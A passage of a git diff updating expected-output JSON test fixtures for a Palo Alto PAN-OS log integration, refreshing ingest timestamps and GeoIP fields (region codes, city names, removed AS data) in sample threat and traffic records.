@@ -11467,7 +11137,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692033Z", + "ingested": "2021-12-14T14:50:40.980260617Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -11495,22 +11165,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -11641,7 +11306,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692039200Z", + "ingested": "2021-12-14T14:50:40.980260970Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -11669,22 +11334,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -11815,7 +11475,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692045400Z", + "ingested": "2021-12-14T14:50:40.980261312Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -11843,22 +11503,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -11989,7 +11644,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692084200Z", + "ingested": "2021-12-14T14:50:40.980261663Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12017,22 +11672,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -12163,7 +11813,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692088300Z", + "ingested": "2021-12-14T14:50:40.980262008Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12191,22 +11841,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -12337,7 +11982,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692092300Z", + "ingested": "2021-12-14T14:50:40.980262357Z", "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12365,22 +12010,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -12511,7 +12151,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692097900Z", + "ingested": "2021-12-14T14:50:40.980262698Z", "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:27.000-05:00", "timezone": "America/New_York", @@ -12539,22 +12179,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -12685,7 +12320,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692102700Z", + "ingested": "2021-12-14T14:50:40.980263034Z", "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", @@ -12713,22 +12348,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -12859,7 +12489,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692107500Z", + "ingested": "2021-12-14T14:50:40.980263395Z", "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", @@ -12887,22 +12517,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -13033,7 +12658,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692112200Z", + "ingested": "2021-12-14T14:50:40.980263852Z", "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:28.000-05:00", "timezone": "America/New_York", @@ -13061,22 +12686,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -13207,7 +12827,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692116100Z", + "ingested": "2021-12-14T14:50:40.980264196Z", "original": "Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:29.000-05:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json index 963b8376a9e..c00395a8af5 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json @@ -8,26 +8,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5976, - "ip": "175.16.199.1", - "packets": 20 + "packets": 20, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -149,7 +144,7 @@ }, "event": { "duration": 586000000000, - "ingested": "2021-12-09T13:44:05.031440300Z", + "ingested": "2021-12-14T14:51:01.287194865Z", "original": "Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:07.000-05:00", "timezone": "America/New_York", @@ -177,26 +172,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -309,7 +299,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031448500Z", + "ingested": "2021-12-14T14:51:01.287197236Z", "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:09.000-05:00", "timezone": "America/New_York", @@ -337,26 +327,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 1035, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -478,7 +463,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:44:05.031454100Z", + "ingested": "2021-12-14T14:51:01.287197683Z", "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:09.000-05:00", "timezone": "America/New_York", @@ -506,26 +491,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -638,7 +618,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031459500Z", + "ingested": "2021-12-14T14:51:01.287198017Z", "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", @@ -666,26 +646,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 1613, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -807,7 +782,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031465Z", + "ingested": "2021-12-14T14:51:01.287198356Z", "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", 
@@ -835,26 +810,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 21111, - "ip": "175.16.199.1", - "packets": 51 + "packets": 51, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -976,7 +946,7 @@ }, "event": { "duration": 85000000000, - "ingested": "2021-12-09T13:44:05.031470500Z", + "ingested": "2021-12-14T14:51:01.287198680Z", "original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:15.000-05:00", "timezone": "America/New_York", @@ -1004,26 +974,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -1136,7 +1101,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031475800Z", + "ingested": "2021-12-14T14:51:01.287199053Z", "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", @@ -1164,26 +1129,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 3732, - "ip": "175.16.199.1", - "packets": 9 + "packets": 9, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1305,7 +1265,7 @@ }, "event": { "duration": 15000000000, - "ingested": "2021-12-09T13:44:05.031481100Z", + "ingested": "2021-12-14T14:51:01.287199439Z", "original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:21.000-05:00", "timezone": "America/New_York", 
@@ -1333,26 +1293,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 221, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1474,7 +1429,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031486600Z", + "ingested": "2021-12-14T14:51:01.287199756Z", "original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:22.000-05:00", "timezone": "America/New_York", @@ -1502,26 +1457,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 221, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -1643,7 +1593,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031492100Z", + "ingested": "2021-12-14T14:51:01.287200078Z", "original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:23.000-05:00", "timezone": "America/New_York", @@ -1671,26 +1621,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5469, - "ip": "175.16.199.1", - "packets": 16 + "packets": 16, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
